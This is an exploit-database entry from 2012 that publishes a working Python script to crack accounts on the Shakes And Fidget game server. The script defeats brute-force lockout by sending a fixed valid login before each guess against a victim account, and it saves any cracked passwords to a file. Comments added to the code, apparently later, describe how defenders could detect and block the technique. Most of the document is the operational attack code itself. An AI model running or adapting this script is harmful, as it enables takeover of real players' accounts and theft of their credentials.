Shakes And Fidget - Brute Force Protection Bypass

2012-07-04T00:00:00
ID 1337DAY-ID-18915
Type zdt
Reporter SnakingMax
Modified 2012-07-04T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                             # Exploit Title: [Shakes And Fidget - Brute Force Protection Bypass]
 # Date: [04/07/2012]
 # Author: [SnakingMax]
 # Website: http://snakingmax.blogspot.com/
 # Software Link: [http://www.sfgame.es/]
 # Vendor: Playa Games GmbH
# Category: [Remote Exploit]


# Vulnerability description:
# Bypass brute force protection by alternating a positive attempt (legitimate account)
# with a test attempt (victim's account).
#
# 26/12/2011 - Vendor informed
# 04/07/2012 - Vulnerability not fixed


######################### EXPLOIT CODE (python 3) ############################

import sys, time, hashlib
from random import randrange
from http.client import HTTPConnection
import urllib.request

	
def str2md5( string ):
	"""Return the lowercase hex MD5 digest of ``string`` after UTF-8 encoding.

	Used below to turn a candidate password into the hash the request carries;
	note that it is plain, unsalted MD5 of the password text.
	"""
	digest = hashlib.md5()
	digest.update(string.encode('utf-8'))
	return digest.hexdigest()


def tryUserPass(username, password):
	"""Send one fixed login request followed by one for ``username``/``password``.

	Two back-to-back GETs go to /request.php on s4.sfgame.es. The first one is a
	hard-coded request (the "positive attempt" in the author's words); the second
	fills the same query template with ``username`` and the unsalted MD5 of
	``password`` plus a random ``rnd`` value. Interleaving the two is the whole
	technique described in the header: presumably the server's lockout logic is
	reset or satisfied by the fixed request, but the server side is not visible
	here, so that is an inference.

	Returns True when the second response body is long enough to be treated as a
	success (see the length check at the bottom), False otherwise. The log file
	the "Password found" message refers to is written by the caller, not here.

	Defender note: the observable signature is pairs of login requests from one
	source, the first always for the same account with rnd=0. Per-target-account
	failure counters that an unrelated successful login does not reset, plus
	per-source rate limiting, would make this interleaving ineffective.
	"""
	print("Trying User: "+username+" and Pass:"+password)
	conn = HTTPConnection('s4.sfgame.es')
	# positive attempt (legitimate account)
	# The username and hash slots of the template used for the second request are
	# filled with constant values here, and rnd is fixed at 0. The response body is
	# never read; only the request itself matters to the author.
	# The literal "%2" in "random=%2" is not a valid percent-escape; it is sent as-is.
	conn.request('GET', "/request.php?req=00000000000000000000000000000000002sfbf%3Bacc1c81abcdab1f53cfdfe7030c076bc%3Bv1.60&random=%2&rnd=0")
	response = conn.getresponse()
	response.close()
	conn.close()
	conn = HTTPConnection('s4.sfgame.es')
	# test attempt (victim's account)
	# {0} = stripped username, {1} = MD5 hex of the stripped password, {2} = random
	# integer in [0, 999999). Each call opens a fresh connection for this request.
	conn.request('GET', "/request.php?req=00000000000000000000000000000000002{0}%3B{1}%3Bv1.60&random=%2&rnd={2}".format(username.strip(),str2md5(str(password.strip())), randrange(999999)))
	response = conn.getresponse()
	# Only the first 10 bytes of the body are kept; nothing is parsed.
	data = response.read()[:10]
	response.close()
	conn.close()
	# str() of a bytes object yields its repr ("b'...'"), which adds three
	# characters, so this condition is met once the body holds five or more bytes.
	# It is a length heuristic, not a check of the response content.
	if (len(str(data)) > 7):
		print("Password found. See log.txt file.")
		return True
	else:
		return False

def bruteforce(userlist, pwdlist):
	"""Try every (user, password) pair from two whitespace-separated word files.

	``userlist`` and ``pwdlist`` are file paths. Each file is read whole and split
	on whitespace, so tokens may be one per line or several per line. For every
	user, every password is handed to tryUserPass in file order; a True result
	appends a record to log.txt in the current working directory.

	There is no pause between attempts and no early exit: a user whose password
	was found is still tried against the remaining passwords, so the server sees
	len(userl) * len(pwdl) request pairs back to back. That burst, together with
	the fixed-account request preceding each attempt, is the signal a rate limit
	or login-anomaly detector would key on.
	"""
	# Read the user list fully, then split on any whitespace (not just newlines).
	usersFileList = open ( userlist , 'rt')
	dumpUsers = usersFileList.read()
	usersFileList.close()
	userl = dumpUsers.split()
	# Same treatment for the password list.
	pwdFileList = open (pwdlist, 'rt')
	dumpPwd = pwdFileList.read()
	pwdl = dumpPwd.split()
	pwdFileList.close()
	# Full cross-product, users outer, passwords inner.
	for i in range(len(userl)):
		for j in range(len(pwdl)):
			if (tryUserPass(userl[i], pwdl[j])):
				# Append-mode text file; opened and closed per hit so partial
				# results survive if the run is interrupted.
				log = open ('log.txt', 'at')
				log.write("\n------PASSWORD FOUND------\nUsername: " + userl[i] + "\nPassword: " + pwdl[j] + "\n--------------------------")
				log.close()

if ( (__name__)=="__main__" ):
	# Command-line entry point: expects exactly two positional arguments, the
	# paths of the user list and the password list passed on to bruteforce().
	if len(sys.argv) != 3:
		print("usage:\n")
		print( sys.argv[0]+" [userlist.txt] [pwdlist.txt]\n\n")
		print("Downloaded from: http://snakingmax.blogspot.com/")
	else:
		userlist = sys.argv[1];  # path to the whitespace-separated user list
		pwdlist = sys.argv[2];  # path to the whitespace-separated password list
		print("Trying Username/Password combinations...")
		bruteforce(userlist, pwdlist)

######################### END OF EXPLOIT CODE (python 3) ############################


